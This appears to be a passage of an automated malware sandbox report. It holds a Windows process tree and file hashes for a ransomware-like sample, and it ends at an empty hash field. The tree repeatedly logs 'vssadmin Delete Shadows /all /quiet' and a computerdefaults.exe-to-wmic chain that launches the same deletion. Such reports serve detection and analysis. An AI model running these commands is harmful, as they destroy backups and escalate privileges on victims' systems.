                                                                                                                                              vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                              1⤵
                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2408
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              cmd /c computerdefaults.exe
                                                                                                                                              1⤵
                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                              PID:2068
                                                                                                                                              • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                computerdefaults.exe
                                                                                                                                                2⤵
                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                PID:4448
                                                                                                                                                • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4600
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                cmd /c computerdefaults.exe
                                                                                                                                                1⤵
                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                PID:1944
                                                                                                                                                • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                  computerdefaults.exe
                                                                                                                                                  2⤵
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:2772
                                                                                                                                                  • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1228
                                                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3516
                                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5144
                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                      vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                      1⤵
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:5192
                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                      vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                      1⤵
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:5200
                                                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5304
                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                        vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                        1⤵
                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                        PID:5760
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        cmd /c computerdefaults.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                        PID:5788
                                                                                                                                                        • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                          computerdefaults.exe
                                                                                                                                                          2⤵
                                                                                                                                                            PID:5924
                                                                                                                                                            • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5172
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            cmd /c computerdefaults.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            PID:5804
                                                                                                                                                            • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                              computerdefaults.exe
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5932
                                                                                                                                                                • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:6140
                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                1⤵
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                PID:4344
                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                1⤵
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                PID:5408
                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                1⤵
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                PID:5964
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                cmd /c computerdefaults.exe
                                                                                                                                                                1⤵
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                PID:5952
                                                                                                                                                                • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                  computerdefaults.exe
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5340
                                                                                                                                                                    • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5160
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    cmd /c computerdefaults.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    PID:5924
                                                                                                                                                                    • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                      computerdefaults.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5172
                                                                                                                                                                        • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5252
                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                        vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                        PID:5264
                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                        vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                        PID:5416
                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                        vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                        PID:5692
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        cmd /c computerdefaults.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        PID:4552
                                                                                                                                                                        • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                          computerdefaults.exe
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:5952
                                                                                                                                                                            • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4204
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            cmd /c computerdefaults.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                            PID:4528
                                                                                                                                                                            • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                              computerdefaults.exe
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:5612
                                                                                                                                                                                • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4472
                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                PID:5300
                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                PID:6032
                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                PID:5900
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                cmd /c computerdefaults.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                PID:5204
                                                                                                                                                                                • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                                  computerdefaults.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5300
                                                                                                                                                                                    • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:6108
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    cmd /c computerdefaults.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                    PID:4600
                                                                                                                                                                                    • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                                      computerdefaults.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:6080
                                                                                                                                                                                        • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5328
                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                        vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                        PID:5464
                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                        vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                        PID:5148
                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                        vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                        PID:3772
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        cmd /c computerdefaults.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                        PID:5368
                                                                                                                                                                                        • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                                          computerdefaults.exe
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:5268
                                                                                                                                                                                            • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                                              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:6128
                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:5736
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              cmd /c computerdefaults.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                              PID:6032
                                                                                                                                                                                              • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                                                computerdefaults.exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:6036
                                                                                                                                                                                                  • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                                                    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:5220
                                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                  vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                  PID:5352
                                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                  vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                  PID:5464
                                                                                                                                                                                                • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                                                                                  C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:5612
                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                    vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                    PID:4212
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    cmd /c computerdefaults.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                    PID:6096
                                                                                                                                                                                                    • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                                                      computerdefaults.exe
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:3276
                                                                                                                                                                                                        • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                                                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4940
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        cmd /c computerdefaults.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                        PID:5444
                                                                                                                                                                                                        • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                                                          computerdefaults.exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:5892
                                                                                                                                                                                                            • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                                                              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5244
                                                                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                            vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                            PID:5776
                                                                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                            vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                            PID:5312
                                                                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                            vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                            PID:6080
                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                            cmd /c computerdefaults.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                            PID:5368
                                                                                                                                                                                                            • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                                                              computerdefaults.exe
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:5228
                                                                                                                                                                                                                • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                                                                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5864
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                cmd /c computerdefaults.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                PID:3840
                                                                                                                                                                                                                • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                                                                  computerdefaults.exe
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5156
                                                                                                                                                                                                                    • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                                                                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:5908
                                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                    vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                    PID:6132
                                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                    vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                    PID:6028
                                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                    vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                    PID:2616
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    cmd /c computerdefaults.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                    PID:4192
                                                                                                                                                                                                                    • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                                                                      computerdefaults.exe
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:5984
                                                                                                                                                                                                                        • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                                                                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:6132
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        cmd /c computerdefaults.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                        PID:5888
                                                                                                                                                                                                                        • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                                                                          computerdefaults.exe
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:5944
                                                                                                                                                                                                                            • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                                                                              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:5512
                                                                                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                            vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                                            PID:2644
                                                                                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                            vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                                            PID:5608
                                                                                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                            vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                                            PID:4892
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            cmd /c computerdefaults.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                            PID:5956
                                                                                                                                                                                                                            • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                                                                              computerdefaults.exe
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:3448
                                                                                                                                                                                                                                • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:3560
                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                cmd /c computerdefaults.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                PID:5776
                                                                                                                                                                                                                                • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                                                                                                                  computerdefaults.exe
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:6072
                                                                                                                                                                                                                                    • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:5264
                                                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                    vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                                    PID:3428
                                                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                    vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                                    PID:5968

                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    152B

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    0446fcdd21b016db1f468971fb82a488

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    726b91562bb75f80981f381e3c69d7d832c87c9d

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    62c5dc18b25e758f3508582a7c58bb46b734a774d97fc0e8a20614235caa8222

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    1df7c085042266959f1fe0aedc5f6d40ceba485b54159f51f0c38f17bb250b79ea941b735e1b6faf219f23fe8ab65ac4557f545519d52d5416b89ad0f9047a31

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    152B

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    9b008261dda31857d68792b46af6dd6d

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    e82dc88e2d1da2df7cb19d79a0346b9bb90d52b3

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    9ac598d4f8170f7e475d84103aead9e3c23d5f2d292741a7f56a17bde8b6f7da

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    78853091403a06beeec4998e2e3a4342111895ffd485f7f7cd367741a4883f7a25864cba00a6c86f27dc0c9ce9d04f08011ecc40c8ae9383d33274739ac39f10

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    5KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    d6b67951f24b1489c39dd99c97e795e4

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    a9c53874cc51f1c65f38dfb69017c60fb8e6f06a

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    6e9ce8fe938128e0ed0510c6a62459bc302955a2daba19a06366069f7edd58cc

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    6bd9f12742121fe1f5c28aa190d2e53117f6b94d57fbff25c648e348e04b24537e567dc06cafddea51cf37a644955529e612f9a2922c601c79a45e8024b9144d

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    6KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    a8a5c9a972d1e9822bdc4e73d63e1056

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    b47afbf11427dacd982c234aed6de74b92c17ed0

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    be965b5723429e8cc74271a05cdc8b7292c124cc2f7eaf6d68773c106bbdb8a4

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    fcfed31647e736b03daf0e8c4fb6096b3bc24a4d8bda28a123465de176f9847e2d63047400e5996405fab7679629934ceadb16d24883ade3e2d0b07a938951d0

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    16B

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    11KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    5836f227d72d7d1ffc9661b40f5bb9d2

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    bdc4cef8ad505569e266e57b1329713ae554d072

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    86b59be01130ad7c1326677b8680c67167eb8b6a9cbce08e2136c3b30e16e6da

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    dec3c5bd93bb52d3f9ce86be8945828373ddfe4aebbf4c62fb63c71dd07bae0b0b4be839d4f938ae138d4110e11138fdccd867eea924e931f80a4349ab973abb

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\1724488678

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    2KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    7485473a8a844421842843ef40fb1ae3

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    f7d7a4c4f31c3c2bd403d5bc185b93328a6103cb

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    eef7f8dd087584166d6c2776c28c025969e1c0b432f0bd6b712a61c3f1d3d4f1

                                                                                                                                                                                                                                    SHA512

